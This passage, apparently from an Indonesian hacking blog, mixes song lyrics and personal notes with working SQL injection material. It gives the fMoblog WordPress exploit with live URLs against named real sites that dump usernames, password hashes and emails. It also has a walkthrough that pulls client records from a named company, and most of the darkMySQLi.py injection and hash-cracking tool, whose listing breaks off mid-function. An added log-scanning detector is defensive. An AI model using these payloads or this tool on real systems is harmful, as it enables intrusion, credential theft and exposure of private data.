Moving

I have finally moved to a new website, so I am no longer posting on this blog. Even so, I will not delete this blog :)

Don't Give Up

bored of hunting for exploits, my spirits are down, I want to sing a song by D'Nasib, oops.. D'Masiv.

D’Masiv – Jangan Menyerah

no human being
is born perfect
don't regret
everything that has happened

we have all surely
faced heavy trials
as if this life
had no meaning anymore

chorus 1:
be thankful for what you have
life is a gift
keep living this life
doing your best

no human being
is born perfect
don't regret
everything that has happened

chorus 2:
God will surely show
His greatness and His power
to His servants who are patient
and never give up

Wordpress Plugin fMoblog Remote SQL Injection Vulnerability

#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################


POC:
http://www.evilredduck.com/?page_id=7&id=-30+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
http://www.rantbox.org/?page_id=590&id=-18+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--


note: sql version 5.x.x

Bugs at an IT company


http://www.teledata.co.id/news_detail.php?nid=-10%20union%20all%20select%201,GROUP_CONCAT%28username,password,full_name,create_date,last_update%29,3,4%20FROM+iters_users--

wow,,, the admin is a woman, whistle whistle... probably too busy at the salon to remember to update her website. How can the last update be a year ago, tsk tsk tsk ...

inspired by vyc0d

SQL injection for dummies

Dork:

news.php?id=
Target:
box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media

add a single quote (')
http://www.boxclever.ca/news.php?id=92'
an error appears:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
This means the site is vulnerable. Once an error like the one above shows up, use the ORDER BY command to find the number of columns, and don't forget to put "--" after the number you enter.

box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
no error is shown, try order by 6

http://www.boxclever.ca/news.php?id=...der%20by%206--
it turns out an error appears:
Unknown column '6' in 'order clause'

With order by 6 the site returns an error like Unknown column '6' in 'order clause', which means there are fewer than 6 columns

box clever ::: news ::: 2 New WRPS Websites Launched ::: intelligent digital media
no more error.

Add a "-" sign in front of the number 92 and use the command UNION+ALL+SELECT+1,2,3,4,5--
box clever ::: news ::: 3 ::: intelligent digital media
these numbers appear:

3
1
4
Replace the number 3, 1 or 4 with version(). I replaced the number 3.
box clever ::: news ::: 5.0.51a-log ::: intelligent digital media
it shows:
5.0.51a-log
This means MySQL version 5

After finding out the version, replace the VERSION() command with GROUP_CONCAT(TABLE_NAME) and append FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- after the column list; that command lists the table names in the database ;)
box clever ::: news ::: client_info,contact,customersurvey,featured_project,news,project,project_level,project_status,project_type,provinces,rfp,uploads ::: intelligent digital media
it shows:

client_info,contact,customersurvey,featured_project,news,project,project_level,project_status,project_type,provinces,rfp,uploads
convert client_info to hexadecimal = 636c69656e745f696e666f
box clever ::: news ::: client_id,client_name,client_street,client_city,client_province,client_pc,client_notes ::: intelligent digital media
it shows:

client_id,client_name,client_street,client_city,client_province,client_pc,client_notes
box clever ::: news ::: +École Rudolph Hennig School9512 - 92 St.Fort SaskatchewanABT8L 1L7Peter & Judy,+ParagondsdsaadsEdmontonABdsadsdadsadsads,+Rocky Point EngineeringsadasdNanaimoBCdsaadssadsadads,+Drive By PunchsadsdsaLeducABdsdsadsdssaasdadsasd

I got information :)
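As an added, defender-side example (not part of the original posts), the following Python 3 script flags the request shapes used in the walkthrough above and in the fMoblog and news_detail.php payloads earlier on this page (a stray quote, ORDER BY n, UNION ALL SELECT, version(), information_schema, GROUP_CONCAT, LOAD_FILE) when run over web-server access logs. The log lines, client addresses and rule names are constructed for this example.

```python
"""Flag UNION-style SQL injection probes in web server access logs.

Added example, not from the original blog post. Every step of the manual
walkthrough above (a stray quote to force a MySQL error, ORDER BY n to count
columns, a negative id with UNION ALL SELECT, then version(),
information_schema.TABLES and GROUP_CONCAT) leaves a footprint in the
request URI, and that is what the rules below key on. The log lines, client
addresses and the rule names are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Undo the encodings seen on this page: %20/%28 escapes, '+' for space and
# /**/ comments in place of whitespace (the evasion darkMySQLi's --end
# option switches between), then fold whitespace and case.
def normalise(uri):
    decoded = unquote_plus(unquote_plus(uri))      # second pass: double-encoded
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # /**/ -> space
    return re.sub(r"\s+", " ", decoded).lower()

# (rule name, pattern), ordered roughly like the steps of the walkthrough.
RULES = [
    ("quote_probe", re.compile(r"[?&]\w+=\d+'(\s|$|&)")),
    ("order_by_probe", re.compile(r"\border by \d+\s*(--|#|$)")),
    ("union_select", re.compile(r"\bunion( all)? select\b")),
    ("version_fingerprint", re.compile(r"\b(version\(\)|@@version)")),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("data_concat", re.compile(r"\bgroup_concat\(")),
    ("file_read", re.compile(r"\bload_file\(")),
]

# Combined-format access log: ip ident user [time] "METHOD URI PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: one client walks through the tutorial's steps against
# /news.php, another client only makes benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2009:11:02:13 +0700] "GET /news.php?id=92 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2009:11:02:20 +0700] "GET /news.php?id=92' HTTP/1.1" 500 311
203.0.113.7 - - [10/Mar/2009:11:02:41 +0700] "GET /news.php?id=92%20order%20by%206-- HTTP/1.1" 500 298
203.0.113.7 - - [10/Mar/2009:11:03:05 +0700] "GET /news.php?id=-92+UNION+ALL+SELECT+1,2,3,4,5-- HTTP/1.1" 200 4871
203.0.113.7 - - [10/Mar/2009:11:03:30 +0700] "GET /news.php?id=-92+UNION+ALL+SELECT+1,2,version(),4,5-- HTTP/1.1" 200 4880
203.0.113.7 - - [10/Mar/2009:11:04:02 +0700] "GET /news.php?id=-92/**/UNION/**/ALL/**/SELECT/**/1,2,GROUP_CONCAT%28TABLE_NAME%29,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29-- HTTP/1.1" 200 5012
198.51.100.4 - - [10/Mar/2009:11:05:00 +0700] "GET /news.php?id=93 HTTP/1.1" 200 5098
198.51.100.4 - - [10/Mar/2009:11:05:09 +0700] "GET /search.php?q=order+by+date HTTP/1.1" 200 2210
"""

def classify(uri):
    """Names of every rule the normalised URI triggers (empty list if clean)."""
    text = normalise(uri)
    return [name for name, rx in RULES if rx.search(text)]

def scan(log_lines):
    """Yield (ip, uri, hits) for each request that trips at least one rule."""
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("uri"))
        if hits:
            yield m.group("ip"), m.group("uri"), hits

def suspicious_sources(log_lines, min_rules=3):
    """Clients that went through at least min_rules distinct stages; a single
    ORDER BY in a search box is noise, quote + ORDER BY + UNION is a probe."""
    seen = {}
    for ip, _uri, hits in scan(log_lines):
        seen.setdefault(ip, set()).update(hits)
    return {ip: sorted(r) for ip, r in seen.items() if len(r) >= min_rules}

if __name__ == "__main__":
    for ip, uri, hits in scan(SAMPLE_LOG.splitlines()):
        print(ip, ",".join(hits), uri)
    print("enumeration suspected from:", suspicious_sources(SAMPLE_LOG.splitlines()))
```

The benign `order+by+date` search request is deliberately included to show that the ORDER BY rule requires a numeric column index, as in the walkthrough, rather than any occurrence of the keyword.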

You are attempting to open a file type that is blocked by your registry policy setting

"You are attempting to open a file type that is blocked by your registry policy setting."

That is the error that appeared when I opened one of my MS PowerPoint files. It turned out the cause was that my Microsoft Office is already at SP3, so its registry setting blocks the file. After consulting uncle Google, I finally found the solution here

[POC] darkMySQLi.py

Well, here we meet again :D This time I will go through the POC for darkMySQLi; the way it is used is the same as schemafuzz.py. Here is the source code:

#!/usr/bin/python
# 1/30/09
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Multi-Purpose MySQL Injection Tool
# FUNCTIONS
# *union injection
# *blind injection
# *post and get method injection ** POST not working yet
# *full information_schema enumeration
# *table and column fuzzer
# *database information extractor
# *column length finder
# *load_file fuzzer
# *general info gathering
# *MySQL hash cracker
# FEATURES
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used

# Share the c0de! (f*ck Windows! Get a real OS!)

# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen
# and the darkc0de crew

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# CHANGES
# 1.6 ADDED --end evasion setting
# 1.5 Fixed --strart now starts at correct number instead of +1
# 1.4 Fixed schema mode when a table was specified - app would hand after last column
# 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping)
# 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string

# BE WARNED, THIS TOOL IS VERY LOUD..

import urllib, sys, re, os, socket, httplib, urllib2, time, random
import cookielib  # needed for the --cookie option (MozillaCookieJar) below

##Set default evasion options here
arg_end = "--" # examples "--", "/*", "#", "", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point
arg_eva = "+" # examples "/**/" ,"+", "%20"
## colMax variable for column Finder
colMax = 200
## Set the default timeout value for requests
socket.setdefaulttimeout(10)
## Default Log File Name
logfile = "darkMySQLi.log"
## File Location to fuzz with for TABLE fuzzer
tablefuzz = "tablesfuzz.txt"
## File Location to fuzz with for COLUMN fuzzer
columnfuzz = "columnsfuzz.txt"
## File Location to fuzz with for LOAD_FILE fuzzer
loadfilefuzz = "loadfilefuzz.txt"
## Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]

#URL Get Function
def GetThatShit(head_URL):
    source = ""
    global gets;global proxy_num
    head_URL = head_URL.replace("+",arg_eva)
    request_web = urllib2.Request(head_URL)
    request_web.add_header('User-Agent',agent)
    # keep requesting (rotating proxies) until a non-empty response comes back
    while len(source) < 1:
        if arg_debug == "on":
            print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
        try:
            gets+=1;proxy_num+=1
            source = proxy_list[proxy_num % proxy_len].open(request_web).read()
        except (KeyboardInterrupt, SystemExit):
            raise
        except (urllib2.HTTPError):
            print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
            print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
            break
        except:
            print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
            print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
            raise
    return source

#the guts and glory - Binary search that does all the guessing for the Blind Methodology
def GuessValue(URL):
    lower = lower_bound;upper = upper_bound
    # narrow [lower, upper) until one value is left
    while lower < upper:
        try:
            mid = (lower + upper) / 2
            head_URL = URL + ">"+str(mid)
            source = GetThatShit(head_URL)
            match = re.findall(arg_string,source)
            if len(match) >= 1:
                lower = mid + 1
            else:
                upper = mid
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            pass

    if lower > lower_bound and lower < upper_bound:
        value = lower
    else:
        # at a bound: confirm with an equality test before trusting the value
        head_URL = URL + "="+str(lower)
        source = GetThatShit(head_URL)
        match = re.findall(arg_string,source)
        if len(match) >= 1:
            value = lower
        else:
            value = 63
            print "Could not find the ascii character! There must be a problem.."
            print "Check to make sure your using the my script right!"
            print "READ xprog's blind sql tutorial!\n"
            sys.exit(1)
    return value

## Functions for MySQL5 hash cracking --- THANKS d3hydr8
## (hashlib / sha are imported in the --crack block below; word[:-1] strips
## the trailing newline left by readlines())
def c1(word):
    s = hashlib.sha1()
    s.update(word[:-1])
    s2 = hashlib.sha1()
    s2.update(s.digest())
    return s2.hexdigest()

def c2(word):
    s = sha.new()
    s.update(word[:-1])
    s2 = sha.new()
    s2.update(s.digest())
    return s2.hexdigest()

## Function for MySQL323 hash cracking
def mysql323(clear):
    # Taken almost verbatim from mysql's source
    nr = 1345345333
    add = 7
    nr2 = 0x12345671
    retval = ""
    for c in clear:
        if c == ' ' or c == '\t':
            continue
        tmp = ord(c)
        nr ^= (((nr & 63) + add) * tmp) + (nr << 8)
        nr2 += (nr2 << 8) ^ nr
        add += tmp
    res1 = nr & ((1 << 31) - 1)
    res2 = nr2 & ((1 << 31) - 1)
    return "%08lx%08lx" % (res1, res2)

#say hello
if len(sys.argv) <= 1:
    print "\n|--------------------------------------------------|"
    print "| rsauron@gmail.com v1.6 |"
    print "| 1/2009 darkMySQLi.py |"
    print "| -- Multi Purpose MySQL Injection Tool -- |"
    print "| Usage: darkMySQLi.py [options] |"
    print "| -h help darkc0de.com |"
    print "|--------------------------------------------------|\n"
    sys.exit(1)

#help option
for arg in sys.argv:
    if arg == "-h" or arg == "--help":
        print "\n darkMySQLi v1.6 rsauron@gmail.com"
        print " forum.darkc0de.com"
        print "Usage: ./darkMySQLi.py [options]"
        print "Options:"
        print " -h, --help shows this help message and exits"
        print " -d, --debug display URL debug information\n"
        print " Target:"
        print " -u URL, --url=URL Target url\n"
        print " Methodology:"
        print " -b, --blind Use blind methodology (req: --string)"
        print " -s, --string String to match in page when the query is valid"
        print " Method:"
        print " --method=PUT Select to use PUT method ** NOT WORKING"
        print " Modes:"
        print " --dbs Enumerate databases MySQL v5+"
        print " --schema Enumerate Information_schema (req: -D,"
        print " opt: -T) MySQL v5+"
        print " --full Enumerate all we can MySQL v5+"
        print " --info MySQL Server configuration MySQL v4+"
        print " --fuzz Fuzz Tables & Columns Names MySQL v4+"
        print " --findcol Find Column length MySQL v4+"
        print " --dump Dump database table entries (req: -T,"
        print " opt: -D, -C, --start) MySQL v4+"
        print " --crack=HASH Crack MySQL Hashs (req: --wordlist)"
        print " --wordlist=LIS.TXT Wordlist to be used for cracking"
        print " Define:"
        print " -D DB database to enumerate"
        print " -T TBL database table to enumerate"
        print " -C COL database table column to enumerate"
        print " Optional:"
        print " --ssl To use SSL"
        print " --end To use + and -- for the URLS --end \"--\" (Default)"
        print " To use /**/ and /* for the URLS --end \"/*\""
        print " --rowdisp Do not display row # when dumping"
        print " --start=ROW Row number to begin dumping at"
        print " --where=COL,VALUE Use a where clause in your dump"
        print " --orderby=COL Use a orderby clause in your dump"
        print " --cookie=FILE.TXT Use a Mozilla cookie file"
        print " --proxy=PROXY Use a HTTP proxy to connect to the target url"
        print " --output=FILE.TXT Output results of tool to this file\n"
        sys.exit(1)

#define variables
site = ""
proxy = "127.0.0.1:9666"
arg_string = ""
arg_blind = "--union"
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_cookie = "None"
arg_insert = "None"
arg_where = ""
arg_orderby = ""
arg_debug = "off"
arg_rowdisp = 1
arg_adminusers = 10
arg_wordlist = ""
arg_ssl = "off"
arg_proxy_auth = ""
darkc0de = "concat(0x1e,0x1e,"
mode = "None"
lower_bound = 0
upper_bound = 16069
line_URL = ""
count_URL = ""
cur_db = ""
cur_table = ""
terminal = ""
count = 0
gets = 0
table_num = 0
num = 0
ser_ver = 3
version =[]
let_pos = 1
lim_num = 0
agent = ""

#Check args
for arg in sys.argv:
    if arg == "-u" or arg == "--url":
        site = sys.argv[count+1]
    elif arg == "--output":
        logfile = sys.argv[count+1]
    elif arg == "--proxy":
        proxy = sys.argv[count+1]
    elif arg == "--proxyauth":
        arg_proxy_auth = sys.argv[count+1]
    elif arg == "--dump":
        mode = arg;arg_dump = sys.argv[count]
    elif arg == "--full":
        mode = arg
    elif arg == "--schema":
        mode = arg;arg_schema = sys.argv[count]
    elif arg == "--dbs":
        mode = arg;arg_dbs = sys.argv[count]
    elif arg == "--fuzz":
        mode = arg;arg_fuzz = sys.argv[count]
    elif arg == "--info":
        mode = arg;arg_info = sys.argv[count]
    elif arg == "--crack":
        mode = arg;arg_hash = sys.argv[count+1]
    elif arg == "--wordlist":
        arg_wordlist = sys.argv[count+1]
    elif arg == "--findcol":
        mode = arg;arg_findcol = sys.argv[count]
    elif arg == "--cookie":
        arg_cookie = sys.argv[count+1]
    elif arg == "--ssl":
        arg_ssl = "on"
    elif arg == "-b" or arg == "--blind":
        arg_blind = arg;arg_blind = sys.argv[count]
    elif arg == "-s" or arg == "--string":
        arg_string = sys.argv[count+1]
    elif arg == "-D":
        arg_database = sys.argv[count+1]
    elif arg == "-T":
        arg_table = sys.argv[count+1]
    elif arg == "-C":
        arg_columns = sys.argv[count+1]
    elif arg == "--start":
        num = int(sys.argv[count+1]) - 1
        table_num = num
    elif arg == "-d" or arg == "--debug":
        arg_debug = "on"
    elif arg == "--where":
        arg_where = sys.argv[count+1]
    elif arg == "--orderby":
        arg_orderby = sys.argv[count+1]
    elif arg == "--rowdisp":
        arg_rowdisp = sys.argv[count]
        arg_rowdisp = 0
    elif arg == "--end":
        arg_end = sys.argv[count+1]
        if arg_end == "--":
            arg_eva = "+"
        else:
            arg_eva = "/**/"
    count+=1

#Title write
file = open(logfile, "a")
print "\n|--------------------------------------------------|"
print "| rsauron@gmail.com v1.6 |"
print "| 1/2009 darkMySQLi.py |"
print "| -- Multi Purpose MySQL Injection Tool -- |"
print "| Usage: darkMySQLi.py [options] |"
print "| -h help darkc0de.com |"
print "|--------------------------------------------------|\n"

#Arg Error Checking
if mode != "--crack" and site == "":
    print "[-] URL is required!\n[-] Need Help? --help\n"
    sys.exit(1)
if mode == "None":
    print "[-] Mode is required!\n[-] Need Help? --help\n"
    sys.exit(1)
if mode == "--schema" and arg_database == "None":
    print "[-] Must include -D flag!\n[-] Need Help? --help\n"
    sys.exit(1)
if mode == "--dump":
    if arg_table == "None" or arg_columns == "None":
        print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
        sys.exit(1)
if proxy != "None":
    if len(proxy.split(".")) == 2:
        proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
            proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if arg_ssl == "off":
    if site[:4] != "http":
        site = "http://"+site
else:
    if site[:5] != "https":
        site = "https://"+site
if site.endswith("/*"):
    site = site.rstrip('/*')
if site.endswith("--"):
    site = site.rstrip('--')
if arg_cookie != "None":
    try:
        cj = cookielib.MozillaCookieJar()
        cj.load(arg_cookie)
        cookie_handler = urllib2.HTTPCookieProcessor(cj)
    except:
        print "[!] There was a problem loading your cookie file!"
        print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
        print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
        sys.exit(1)
else:
    cookie_handler = urllib2.HTTPCookieProcessor()
if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1:
    print "[-] Site must contain \'darkc0de\'\n"
    sys.exit(1)
if arg_blind == "--blind" and arg_string == "":
    print "[-] You must specify a --string when using blind methodology.\n"
    sys.exit(1)
if arg_columns != "None":
    arg_columns = arg_columns.split(",")
if arg_insert != "None":
    arg_insert = arg_insert.split(",")
if mode == "--crack" and arg_wordlist == "":
    print "[-] You must specify a --wordlist to crack with.\n"
    sys.exit(1)
agent = random.choice(agents)

file.write("\n|--------------------------------------------------|")
file.write("\n| rsauron@gmail.com v1.6 |")
file.write("\n| 1/2009 darkMySQLi.py |")
file.write("\n| -- Multi Purpose MySQL Injection Tool -- |")
file.write("\n| Usage: darkMySQLi.py [options] |")
file.write("\n| -h help darkc0de.com |")
file.write("\n|--------------------------------------------------|")

## MySQL Hash cracking
if mode == "--crack":
    try:
        arg_wordlist = open(arg_wordlist, "r")
    except(IOError):
        print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
        sys.exit(1)
    if len(arg_hash) != 40 and len(arg_hash) != 16:
        print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
        sys.exit(1)
    arg_wordlist = arg_wordlist.readlines()
    print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
    if len(arg_hash) == 40:
        print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
        try:
            import hashlib
            for word in arg_wordlist:
                if arg_hash == c1(word):
                    print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
                    break
        except(ImportError):
            import sha
            for word in arg_wordlist:
                if arg_hash == c2(word):
                    print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
                    break
    else:
        print "[+] Detected MySQL v4 Hash:",arg_hash
        print "[+] Try darkc0de hash database @ "
        for word in arg_wordlist:
            word = word.rstrip("\n")
            if arg_hash == mysql323(word):
                print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
                break
    print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
    sys.exit(1)

#General Info
print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
if site[:5] == "https":
    print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
else:
    print "[+] SSL: No";file.write("\n[+] SSL: No")
print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)

#Build proxy list
proxy_list = [];proxy_list_count = []
if proxy != "None":
    print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
    for p in proxy:
        try:
            match = re.findall(":",p)
            if len(match) == 3:
                arg_proxy_auth = []
                prox = p.split(":")
                arg_proxy_auth += prox
            if arg_proxy_auth != "":
                proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
                proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
                opener = urllib2.build_opener(proxy_auth_handler)
                opener.open("http://www.google.com")
                proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
                proxy_list_count.append(p);arg_proxy_auth = ""
            else:
                proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                opener = urllib2.build_opener(proxy_handler)
                opener.open("http://www.google.com")
                proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
                proxy_list_count.append(p)
            if len(match) == 3 or len(match) == 1:
                print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
            else:
                print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
        except:
            print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
            pass
    if len(proxy_list) == 0:
        print "[-] All proxies have failed. App Exiting"
        sys.exit(1)
    print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener(cookie_handler))
    proxy_list_count.append("None")
proxy_num = 0
proxy_len = len(proxy_list)

## Blind String checking!
if arg_blind == "--blind":
    print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
    head_URL = site+"+AND+1=1"
    source = GetThatShit(head_URL)
    match = re.findall(arg_string,source)
    if len(match) >= 2:
        print "\n[-] The String you used has been found on the target page in-use more than 2 times"
        print "[-] This might lead to false positives with the blind methodology"
        print "[-] Might not mean anything.. I am just trying to help out.."
        print "[-] If you have problems you might know why.. ;-)\n"
    if len(match) == 0:
        print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
        sys.exit(1)
    if len(match) == 1:
        print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")

#Column Finder c0de
if mode == "--findcol":
    print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
    print "[+] Testing: ",
    file.write("\n[+] Testing: ",)
    checkfor=[];nullFound=[];nullnum=[];makepretty = ""
    sitenew = site+"+AND+1=2+UNION+SELECT+"
    for x in xrange(1,colMax):
        try:
            sys.stdout.write("%s," % (x))
            file.write(str(x)+",")
            sys.stdout.flush()
            darkc0de = "dark"+str(x)+"code"
            checkfor.append(darkc0de)
            if x > 1:
                sitenew += ","
            sitenew += "0x"+darkc0de.encode("hex")
            finalurl = sitenew+arg_end
            source = GetThatShit(finalurl)
            for y in checkfor:
                colFound = re.findall(y,source)
                if len(colFound) != 0:
                    nullFound.append(colFound[0])
            if len(nullFound) >= 1:
                print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
                print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
                for z in nullFound:
                    nullcol = re.findall(("\d+"),z)
                    nullnum.append(nullcol[0])
                    sys.stdout.write("%s," % (nullcol[0]))
                    file.write(str(nullcol[0])+",")
                    sys.stdout.flush()
                for z in xrange(0,len(checkfor)):
                    z+=1
                    if z > 1:
                        makepretty += ","
                    makepretty += str(z)
                site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
                print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
                for z in nullnum:
                    site = site.replace("+"+z+",","+darkc0de,")
                    site = site.replace(","+z+",",",darkc0de,")
                    site = site.replace(","+z+arg_end,",darkc0de"+arg_end)
                print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site)
                print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
                print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
                print "[-] Done\n";file.write("\n[-] Done\n")
                print "Don't forget to check", logfile,"\n"
                file.close();sys.exit(1)
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            pass

    print "\n[!] Sorry Column Length could not be found."
    file.write("\n[!] Sorry Column Length could not be found.")
    print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
    print "[-] Done\n"
    sys.exit(1)

#Retrieve version:user:database
if arg_blind != "--blind":
    head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
    print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
    source = GetThatShit(head_URL)
    match = re.findall("\x1e\x1e\S+",source)
    if len(match) >= 1:
        match = match[0][0:].split("\x1e")
        version = match[2]
        user = match[3]
        database = match[4]
        print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
        print "\tUser:", user;file.write("\tUser: "+user+"\n")
        print "\tVersion:", version;file.write("\tVersion: "+version)
    else:
        print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
        sys.exit(1)
else:
    print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
    while 1:
        config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
        source = GetThatShit(config_URL)
        match = re.findall(arg_string,source)
        if len(match) >= 1:
            print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
            version += str(ser_ver)
            break
        if ser_ver == 6:
            print "[-] Was unable to determine MySQL version.\n[-] Done"
            sys.exit(1)
        ser_ver+=1

#lets check what we can do based on version
if mode == "--schema" or mode == "--dbs" or mode == "--full":
    if version[0] == str(4):
        print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
        print "[-] -h for help"
        sys.exit(1)

# Mode --info
if mode == "--info" and arg_blind != "--blind":
    head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end
    source = GetThatShit(head_URL)
    match = re.findall("darkc0de",source)
    if len(match) >= 1:
        yesno = "YES <-- w00t w00t"
    else:
        yesno = "NO"
